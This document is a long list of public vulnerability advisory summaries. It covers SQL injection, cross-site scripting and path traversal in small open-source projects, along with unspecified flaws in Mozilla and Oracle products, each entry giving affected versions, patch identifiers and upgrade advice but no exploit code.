A vulnerability classified as critical has been found in prodigasistemas curupira up to 0.1.3. Affected is an unknown function of the file app/controllers/curupira/passwords_controller.rb. The manipulation leads to sql injection. Upgrading to version 0.1.4 is able to address this issue. The patch is identified as 93a9a77896bb66c949acb8e64bceafc74bc8c271. It is recommended to upgrade the affected component. VDB-218394 is the identifier assigned to this vulnerability.
A vulnerability was found in Overdrive Eletrônica course-builder up to 1.7.x and classified as problematic. Affected by this issue is some unknown functionality of the file coursebuilder/modules/oeditor/oeditor.html. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.8.0 is able to address this issue. The name of the patch is e39645fd714adb7e549908780235911ae282b21b. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218372.
A vulnerability was found in bmattoso desafio_buzz_woody. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The identifier of the patch is cb8220cbae06082c969b1776fcb2fdafb3a1006b. It is recommended to apply a patch to fix this issue. The identifier VDB-218357 was assigned to this vulnerability.
A vulnerability was found in KYUUBl school-register. It has been classified as critical. This affects an unknown part of the file src/DBManager.java. The manipulation leads to sql injection. The patch is named 1cf7e01b878aee923f2b22cc2535c71a680e4c30. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218355.
A vulnerability has been found in lolfeedback and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The identifier of the patch is 6cf0b5f2228cd8765f734badd37910051000f2b2. It is recommended to apply a patch to fix this issue. The identifier VDB-218353 was assigned to this vulnerability.
A vulnerability classified as critical was found in gophergala sqldump. This vulnerability affects unknown code. The manipulation leads to sql injection. The patch is identified as 76db54e9073b5248b8863e71a63d66a32d567d21. It is recommended to apply a patch to fix this issue. VDB-218350 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in abreen Apollo. This affects an unknown part. The manipulation of the argument file leads to path traversal. The patch is named 6206406630780bbd074aff34f4683fb764faba71. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218307.
A vulnerability was found in dobos domino. It has been rated as critical. Affected by this issue is some unknown functionality in the library src/Complex.Domino.Lib/Lib/EntityFactory.cs. The manipulation leads to sql injection. Upgrading to version 0.1.5524.38553 is able to address this issue. The name of the patch is 16f039073709a21a76526110d773a6cce0ce753a. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218024.
A vulnerability was found in nym3r0s pplv2. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The patch is named 28f8b0550104044da09f04659797487c59f85b00. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218023.
A vulnerability, which was classified as critical, was found in ACI_Escola. This affects an unknown part. The manipulation leads to sql injection. The identifier of the patch is 34eed1f7b9295d1424912f79989d8aba5de41e9f. It is recommended to apply a patch to fix this issue. The identifier VDB-217965 was assigned to this vulnerability.
A vulnerability was found in kylebebak dronfelipe. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The patch is named 87405b74fe651892d79d0dff62ed17a7eaef6a60. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217951.
A vulnerability has been found in j-nowak workout-organizer and classified as critical. This vulnerability affects unknown code. The manipulation leads to sql injection. The patch is identified as 13cd6c3d1210640bfdb39872b2bb3597aa991279. It is recommended to apply a patch to fix this issue. VDB-217714 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in jvvlee MerlinsBoard. This affects an unknown part of the component Grade Handler. The manipulation leads to improper authorization. The identifier of the patch is 134f5481e2914b7f096cd92a22b1e6bcb8e6dfe5. It is recommended to apply a patch to fix this issue. The identifier VDB-217713 was assigned to this vulnerability.
A vulnerability was found in HealthMateWeb. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file createaccount.php. The manipulation of the argument username/password/first_name/last_name/company/phone leads to cross site scripting. The attack can be launched remotely. The patch is named 472776c25b1046ecaf962c46fed7c713c72c28e3. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217663.
A vulnerability classified as critical was found in purpleparrots 491-Project. This vulnerability affects unknown code of the file update.php of the component Highscore Handler. The manipulation leads to sql injection. The name of the patch is a812a5e4cf72f2a635a716086fe1ee2b8fa0b1ab. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217648.
A vulnerability has been found in SUKOHI Surpass and classified as critical. This vulnerability affects unknown code of the file src/Sukohi/Surpass/Surpass.php. The manipulation of the argument dir leads to pathname traversal. Upgrading to version 1.0.0 is able to address this issue. The patch is identified as d22337d453a2a14194cdb02bf12cdf9d9f827aa7. It is recommended to upgrade the affected component. VDB-217642 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in kelvinmo simplexrd up to 3.1.0. This vulnerability affects unknown code of the file simplexrd/simplexrd.class.php. The manipulation leads to xml external entity reference. Upgrading to version 3.1.1 is able to address this issue. The patch is identified as 4c9f2e028523ed705b555eca2c18c64e71f1a35d. It is recommended to upgrade the affected component. VDB-217630 is the identifier assigned to this vulnerability.
A vulnerability has been found in ss15-this-is-sparta and classified as problematic. This vulnerability affects unknown code of the file js/roomElement.js of the component Main Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is ba2f71ad3a46e5949ee0c510b544fa4ea973baaa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217624.
A vulnerability, which was classified as problematic, has been found in hydrian TTRSS-Auth-LDAP. Affected by this issue is some unknown functionality of the component Username Handler. The manipulation leads to ldap injection. Upgrading to version 2.0b1 is able to address this issue. The patch is identified as a7f7a5a82d9202a5c40d606a5c519ba61b224eb8. It is recommended to upgrade the affected component. VDB-217622 is the identifier assigned to this vulnerability.
A vulnerability was found in tiredtyrant flairbot. It has been declared as critical. This vulnerability affects unknown code of the file flair.py. The manipulation leads to sql injection. The patch is identified as 5e112b68c6faad1d4699d02c1ebbb7daf48ef8fb. It is recommended to apply a patch to fix this issue. VDB-217618 is the identifier assigned to this vulnerability.
A vulnerability has been found in luelista miniConf up to 1.7.6 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file miniConf/MessageView.cs of the component URL Scanning. The manipulation leads to denial of service. Upgrading to version 1.7.7 and 1.8.0 is able to address this issue. The patch is named c06c2e5116c306e4e1bc79779f0eda2d1182f655. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217615.
A vulnerability classified as critical was found in hoffie larasync. This vulnerability affects unknown code of the file repository/content/file_storage.go. The manipulation leads to path traversal. The name of the patch is 776bad422f4bd4930d09491711246bbeb1be9ba5. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217612.
A vulnerability was found in IISH nlgis2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file scripts/etl/custom_import.pl. The manipulation leads to sql injection. The identifier of the patch is 8bdb6fcf7209584eaf1232437f0f53e735b2b34c. It is recommended to apply a patch to fix this issue. The identifier VDB-217609 was assigned to this vulnerability.
A vulnerability was found in ritterim definely. It has been classified as problematic. Affected is an unknown function of the file src/database.js. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is b31a022ba4d8d17148445a13ebb5a42ad593dbaa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217608.
A vulnerability, which was classified as problematic, has been found in foxoverflow MySimplifiedSQL. This issue affects some unknown processing of the file MySimplifiedSQL_Examples.php. The manipulation of the argument FirstName/LastName leads to cross site scripting. The attack may be initiated remotely. The patch is named 3b7481c72786f88041b7c2d83bb4f219f77f1293. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217595.
A vulnerability has been found in HPI-Information-Systems ProLOD and classified as critical. This vulnerability affects unknown code. The manipulation of the argument this leads to sql injection. The name of the patch is 3f710905458d49c77530bd3cbcd8960457566b73. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217552.
A vulnerability, which was classified as critical, has been found in glidernet ogn-live. This issue affects some unknown processing. The manipulation leads to sql injection. The patch is named bc0f19965f760587645583b7624d66a260946e01. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217487.
A vulnerability classified as critical has been found in arekk uke. This affects an unknown part of the file lib/uke/finder.rb. The manipulation leads to sql injection. The identifier of the patch is 52fd3b2d0bc16227ef57b7b98a3658bb67c1833f. It is recommended to apply a patch to fix this issue. The identifier VDB-217485 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in sumocoders FrameworkUserBundle up to 1.3.x. It has been rated as problematic. Affected by this issue is some unknown functionality of the file Resources/views/Security/login.html.twig. The manipulation leads to information exposure through error message. Upgrading to version 1.4.0 is able to address this issue. The name of the patch is abe4993390ba9bd7821ab12678270556645f94c8. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217268. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as problematic has been found in OpenDNS OpenResolve. This affects an unknown part of the file resolverapi/endpoints.py. The manipulation leads to improper output neutralization for logs. The identifier of the patch is 9eba6ba5abd89d0e36a008921eb307fcef8c5311. It is recommended to apply a patch to fix this issue. The identifier VDB-217197 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in 82Flex WEIPDCRM. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The identifier of the patch is 43bad79392332fa39e31b95268e76fbda9fec3a4. It is recommended to apply a patch to fix this issue. The identifier VDB-217185 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in 82Flex WEIPDCRM and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is 43bad79392332fa39e31b95268e76fbda9fec3a4. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217184. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability, which was classified as problematic, has been found in admont28 Ingnovarq. Affected by this issue is some unknown functionality of the file app/controller/insertarSliderAjax.php. The manipulation of the argument imagetitle leads to cross site scripting. The attack may be launched remotely. The name of the patch is 9d18a39944d79dfedacd754a742df38f99d3c0e2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217172.
A vulnerability was found in markdown-it up to 2.x. It has been classified as problematic. Affected is an unknown function of the file lib/common/html_re.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 89c8620157d6e38f9872811620d25138fc9d1b0d. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216852.
A vulnerability, which was classified as problematic, was found in FileZilla Server up to 0.9.50. This affects an unknown part of the component PORT Handler. The manipulation leads to unintended intermediary. It is possible to initiate the attack remotely. Upgrading to version 0.9.51 is able to address this issue. It is recommended to upgrade the affected component.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 36.0, Firefox ESR 31.x before 31.5, and Thunderbird before 31.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 36.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 37.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Buffer overflow in an unspecified function in nsr_render_log in EMC NetWorker before 8.0.4.3, 8.1.x before 8.1.2.6, and 8.2.x before 8.2.1.2 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : SP.
Unspecified vulnerability in the Oracle Hyperion BI+ component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote attackers to affect integrity via unknown vectors related to Reporting and Analysis.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB, a different vulnerability than CVE-2015-0506.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2015-0508.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6 and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Error Messages.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1 and 8.2 allows remote attackers to affect integrity via unknown vectors related to Portal Framework.
Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Compiling.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Federated.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Replication.
Unspecified vulnerability in the PeopleSoft Enterprise Portal Interaction Hub component in Oracle PeopleSoft Products 9.1.00 allows remote attackers to affect integrity via unknown vectors related to Enterprise Portal.
Unspecified vulnerability in the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce Platform 3.x and 11.x allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Workbench.
Unspecified vulnerability in the Oracle Retail Central Office component in Oracle Retail Applications 13.1, 13.2, 13.3, 13.4, 14.0, and 14.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.4.1, 8.5.0, and 8.5.1 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-0474.
Unspecified vulnerability in Oracle Java SE 7u76 and 8u40, and JavaFX 2.2.76, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-0484.
Unspecified vulnerability in Oracle Java SE 5.0u81, 6u91, 7u76, and 8u40, and Java FX 2.2.76, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2015-0459.
Unspecified vulnerability in Oracle Java SE 8u40 allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in the PeopleSoft Enterprise SCM Strategic Sourcing component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 7u76 and 8u40, and Java FX 2.2.76, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-0492.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle Java SE 5.0u81, 6u91, 7u76, and 8u40 allows remote attackers to affect integrity and availability via unknown vectors related to Tools.
Unspecified vulnerability in the XDK and XDB - XML Database component in Oracle Database Server 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 5.0u81, 6u91, 7u76, and 8u40 allows remote attackers to affect integrity via unknown vectors related to Beans.
Unspecified vulnerability in the SQL Trace Analyzer component in Oracle Support Tools before 12.1.11 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the JD Edwards EnterpriseOne Technology component in Oracle JD Edwards Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Runtime Security.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.4.1, 8.5.0, and 8.5.1 allows local users to affect availability via unknown vectors related to Outside In Filters, a different vulnerability than CVE-2015-0493.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control MOS 12.1.0.5 and 12.1.0.6 allows remote attackers to affect integrity via unknown vectors related to My Oracle Support Plugin.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to libelfsign.
Unspecified vulnerability in Oracle Java SE 8u40 allows remote attackers to affect integrity via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Java SE 5.0u81, 6u91, 7u76, and 8u40 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, and 12.1.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM Talent Acquisition Manager component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Retail Back Office component in Oracle Retail Applications 12.0, 12.0IN, 13.0, 13.1, 13.2, 13.3, 13.4, 14.0, and 14.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.3.5, and 6.3.6 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Infrastructure.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.3.5, and 6.3.6 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.3.5, and 6.3.6 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.3.5, and 6.3.6 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.5 and 11.1.1.7 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Authentication Engine.
Unspecified vulnerability in Oracle Java SE 5.0u81, 6u91, 7u76, and 8u40 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Java SE 5.0u81, 6u91, 7u76, and 8u40, and JavaFX 2.2.76, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2015-0491.
Unspecified vulnerability in in Oracle Java SE 6u91, 7u76, and 8u40 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2629.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.8.0 allows remote attackers to affect integrity via unknown vectors related to Portlet Services.
Unspecified vulnerability in the XDB - XML Database component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle VM Server for SPARC component in Oracle Sun Systems Products Suite 3.1 and 3.2 allows remote attackers to affect confidentiality via unknown vectors related to Ldom Manager.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.8.0 allows remote attackers to affect integrity via unknown vectors related to WebCenter Spaces Application.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.1.0, and 12.1.2.0 allows remote attackers to affect integrity via unknown vectors related to Console.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0445, CVE-2015-2634, CVE-2015-2635, CVE-2015-2636, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0444, CVE-2015-0446, CVE-2015-2634, CVE-2015-2635, CVE-2015-2636, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0443, CVE-2015-0445, CVE-2015-0446, CVE-2015-2634, CVE-2015-2635, CVE-2015-2636, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality based on Trillium, a different vulnerability than CVE-2015-0444, CVE-2015-0445, CVE-2015-0446, CVE-2015-2634, CVE-2015-2635, CVE-2015-2636, CVE-2015-4758, and CVE-2015-4759.
Unspecified vulnerability in Oracle MySQL Server 5.5.41 and earlier, and 5.6.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Encryption.
Unspecified vulnerability in the Oracle Knowledge component in Oracle Right Now Service Cloud 8.2.3.10.1 and 8.4.7.2 allows remote attackers to affect integrity via unknown vectors related to Information Manager Console.
Unspecified vulnerability in Oracle MySQL Server 5.6.22 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB, a different vulnerability than CVE-2015-4756.
Unspecified vulnerability in Oracle MySQL Server 5.6.22 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition.
Unspecified vulnerability in Oracle Java SE 8u25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 6.0 and 6.1 allows remote attackers to affect confidentiality via unknown vectors related to Login.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, and 6.3.5 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0 6.3.1, 6.3.2, 6.3.4, and 6.3.5 allows remote attackers to affect integrity via unknown vectors related to UI Infrastructure.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect availability via unknown vectors related to Resource Control.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control 12.1.0.3 and 12.1.0.4 allows remote attackers to affect confidentiality via unknown vectors related to UI Framework.
Unspecified vulnerability in the Oracle Enterprise Asset Management component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Siebel Core - Unix/Windows.
Unspecified vulnerability in Oracle MySQL Server 5.6.22 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3.0, 6.3.1, 6.3.2, 6.3.3, 6.3.4, and 6.3.5 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Infrastructure.
Unspecified vulnerability in Oracle Java SE 8u25 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the installation process.
Unspecified vulnerability in the Oracle Forms component in Oracle Fusion Middleware 11.1.1.7 and 11.1.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Forms Services.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Portal Framework, a different vulnerability than CVE-2013-1510.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.26, 4.0.28, 4.1.36, and 4.2.28 allows local users to affect availability via unknown vectors related to Core, a different vulnerability than CVE-2015-0377.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Portal Framework, a different vulnerability than CVE-2015-0388.
Unspecified vulnerability in the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.3 allows remote authenticated users to affect integrity via unknown vectors related to Roles &amp; Privileges.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Session Management.
Unspecified vulnerability in the Oracle SOA Suite component in Oracle Fusion Middleware 11.1.1.7 and 12.1.3.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Fabric Layer.
Unspecified vulnerability in Oracle Java SE 7u72 and 8u25 allows local users to affect integrity via unknown vectors related to Serviceability.
Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier, and 5.6.21 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Server : Security : Encryption.
Unspecified vulnerability in the Java SE, Java SE Embedded, JRockit component in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25; Java SE Embedded 7u71 and 8u6; and JRockit R27.8.4 and R28.3.4 allows remote attackers to affect availability via unknown vectors related to Security.
Unspecified vulnerability in Oracle MySQL Server 5.6.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality via unknown vectors related to Swing.
Unspecified vulnerability in Oracle Java SE 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle MySQL Server 5.6.22 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect integrity via unknown vectors related to Error Messages.
Unspecified vulnerability in Oracle Java SE 6u85, 7u72, and 8u25 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Directory Server Enterprise Edition component in Oracle Fusion Middleware 7.0 and 11.1.1.7 allows remote authenticated users to affect integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in Oracle Java SE 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle Business Intelligence Enterprise Edition component in Oracle Fusion Middleware 10.1.3.4.2 and 11.1.1.7 allows remote authenticated users to affect confidentiality via unknown vectors related to Analytics Web General.
Unspecified vulnerability in the Siebel Life Sciences component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Clinical Trip Report.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to File System, a different vulnerability than CVE-2014-6570 and CVE-2014-6600.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 and 3.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Admin Console.
Unspecified vulnerability in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote authenticated users to affect confidentiality via unknown vectors related to Report Distribution.
Unspecified vulnerability in the Oracle Applications DBA component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to DB Privileges.  NOTE: the previous information is from the January 2015 CPU. Oracle has not commented on the researcher's claim that the PUBLIC role is granted the INDEX privilege for the DUAL table during a "seeded install," which allows remote authenticated users to gain SYSDBA privileges and execute arbitrary code.
Unspecified vulnerability in the Siebel Core - Server BizLogic Script component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Config - Scripting.
Unspecified vulnerability in the MICROS Retail component in Oracle Retail Applications Xstore: 3.2.1, 3.4.2, 3.5.0, 4.0.1, 4.5.1, 4.8.0, 5.0.3, 5.5.3, 6.0.6, and 6.5.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Xstore Point of Sale.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Portal Framework, a different vulnerability than CVE-2015-0417.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.7.0, 12.1.2.0, and 12.1.3.0 allows remote attackers to affect availability via unknown vectors related to Web Listener, a different vulnerability than CVE-2013-0338, CVE-2013-2877, and CVE-2014-0191.
Unspecified vulnerability in Oracle MySQL Server 5.6.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Pluggable Auth.
